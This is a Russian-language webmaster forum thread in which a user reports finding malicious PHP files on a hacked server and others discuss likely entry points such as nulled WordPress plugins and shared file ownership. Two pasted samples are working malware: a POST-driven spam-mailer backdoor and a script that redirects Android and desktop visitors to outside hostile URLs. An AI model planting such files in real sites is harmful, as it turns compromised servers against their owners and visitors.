Новая тема   Ответить

 CrazyMen
Обнаружи у себя повсеместно созданный файл wfg.php с таким содержимым:

<?php $HmqenXtApUBX = stripslashes($_POST['OejVxex']); $SFQsFl = stripslashes($_POST['GQrR']); $oabczZQYGw = stripslashes($_POST['bupthoehyRL']);  $rato = mail(stripslashes($HmqenXtApUBX), stripslashes($SFQsFl), stripslashes($oabczZQYGw)); if($rato){echo 'dOuAfkhHe';} else {echo 'MdxXEYvzD : '.$XJaIKNNKlBfm;} ?>

Проверьте у себя наличие на всякий пожарный.

 Evial
я бы присмотрелся к WP и его плагинам

 CrazyMen
Даже пока что не знаю на что думать...

 Дартаньян
CrazyMen: стукни мне в скайп помогу. А так могли через что угодно но в этом списке скорее CJ.

 karbonv
"Tuberotator, Smart CJ, WP, Crystal"

Ппц бро! Совет тебе хороший дам - раздели все скрипты по юзерам, так хоть знать будешь где тебя ебанули

 nrianx
WP нуленый плагин с шелом какой нить, было уже такое

 CrazyMen
Да че то недоглядел за этим обычно каждый домен отдельный юзер, а тут.. Скорее всего Wp конечно, только утсановили уже спамить блять начинают, поэтому его и не люблю.. Чем популярнее скрипт тем больше дыр

 Дартаньян
CrazyMen: вернее не в нем а в темах и плагинах, про спам отруби комменты и все ок.

 Cosinus
советую зарегистриться на ifube и узнавать о появлении всяких левых файлов сразу. сервис пока еще бесплатный.

 Дартаньян
Cosinus: была такаяже мысля.

 karbonv
CrazyMen писал:
Тыц
но как они к сисечным сайтам относятся я хз

 CrazyMen
Кароче вычистили червак от нечисти. Удалил WP. И сегодня опять всякая хуйня, но уже только на том домене где стоит tuberotator и crustal. Картина возможно сужается...

 CrazyMen
Только там где стоит тубротатор захуячили разноименный php с таким вот содержимым:
<?php

$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$android_urls = array (
         'http://com-ap8.net/zoota.php?a=314759&c=wl_con&s=12AND',
         'http://com-152.net/bfqa.php?a=314759&c=wl_con&s=12AND',
         'http://com-uh4.net/rbhnc.php?a=314759&c=wl_con&s=12AND',
);
$not_android_urls = array (
         'http://com-ap8.net/addd.php?a=314759&c=wl_con&s=12YP',
         'http://com-152.net/uzder.php?a=314759&c=wl_con&s=12YP',
         'http://com-uh4.net/uls.php?a=314759&c=wl_con&s=12YP',
);
$n = mt_rand(0,count($not_android_urls)-1);
$rand_url=$not_android_urls[$n];

if ( $android  == true)
{
$n = mt_rand(0,count($android_urls)-1);
$rand_url=$android_urls[$n];
}
?>
<meta http-equiv="refresh" content="2; url=<?php echo $rand_url;?> ">

 karbonv
CrazyMen писал:

может дело не в скриптах вовсе? то что код нахуячили это одно, он любой может быть

Смотри сам сервер, чмод, доступы... логи читай в конце концов

 nrianx
Тебе теперь проверяй все файлы, потому что если владелиц папки где вп стоял и везде владельцем был то мод везде залезть.

 CrazyMen
Ебошат через апач...

 Дартаньян
CrazyMen: апач?

 karbonv
Если хост тот что в подписи там сипанелька по идее стоит, давно ее не юзал правда, но по памяти там иерархия хранения скриптов и назначение им юзеров - полный пиздец (может что и изменилось за последнее время я хз), если у тебя было все в одном котле 100 % у тебя уже заражено все скрипты, и то чтоты удалишь файл или один из скриптов полностью до жопы и апач не причем!

 Дартаньян
как я и ранее говорил пиши мне глянем что за пиздец у тебя.